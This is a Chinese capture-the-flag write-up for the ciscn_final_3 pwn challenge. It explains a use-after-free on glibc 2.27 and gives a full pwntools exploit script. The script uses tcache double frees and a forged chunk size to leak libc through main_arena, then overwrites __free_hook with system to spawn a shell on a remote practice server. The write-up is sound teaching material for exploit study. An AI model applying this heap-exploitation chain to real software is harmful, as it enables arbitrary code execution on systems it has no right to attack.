欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

ciscn_final_3

程序员文章站 2022-05-15 21:51:20
...

ciscn_final_3

程序给的glibc版本为2.27,存在tcache机制

首先检查一下程序的保护机制

ciscn_final_3

然后,我们用IDA分析一下

Delete功能存在UAF漏洞

ciscn_final_3

程序没有show的功能,但是add时,会显示堆的地址。

ciscn_final_3

为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,把堆申请到main_arena处,打印堆地址时,返回的就是main_arena的地址。由于glibc版本为2.27,因此很容易利用,要得到unsorted bin范围的chunk,我们只需要篡改chunk的头部,然后多次free。

#coding:utf8
from pwn import *

#sh = process('./ciscn_final_3')
sh = remote('node3.buuoj.cn',29193)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
free_hook_s = libc.symbols['__free_hook']
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']

def add(index,size,content):
   sh.sendlineafter('choice >','1')
   sh.sendlineafter('input the index',str(index))
   sh.sendlineafter('input the size',str(size))
   sh.sendafter('now you can write something',content)
   sh.recvuntil('gift :')
   heap_addr = int(sh.recvuntil('\n',drop = True),16)
   return heap_addr

def delete(index):
   sh.sendlineafter('choice >','2')
   sh.sendlineafter('input the index',str(index))

#0
add(0,0x70,'a'*0x70) - 0x10
#1
heap_addr = add(1,0x70,'b'*0x70) - 0x10
for i in range(2,10):
   add(i,0x70,'c'*0x70)

#10
add(10,0x10,'e'*0x10)
print 'heap_addr=',hex(heap_addr)
#double free
#多弄几个,使得size最后不会变成负数
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)

#修改tcache的next指针,同时,设置chunk1的prev_size域为chunk1本身的地址,这样,我们申请到chunk1的头部时,next指针就对应了prev_size域
#由此继续形成了循环链表
add(11,0x78,p64(heap_addr) + 'a'*0x68 + p64(heap_addr + 0x10))
add(12,0x70,'a'*0x70)

#修改chunk1的头信息,使得1~9的大小合并
add(13,0x70,p64(heap_addr) + p64(0x80*9 + 1))
#获得unsorted bin
delete(1)
add(14,0x70,'d')
#申请到main_arena里,从而获得libc地址
main_arena_xx = add(15,0x70,'e')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(0)
delete(0)
add(16,0x70,p64(free_hook_addr))
add(17,0x70,'/bin/sh\x00')
#写free_hook
add(18,0x70,p64(system_addr))
#getshell
delete(17)

sh.interactive()

 

推荐阅读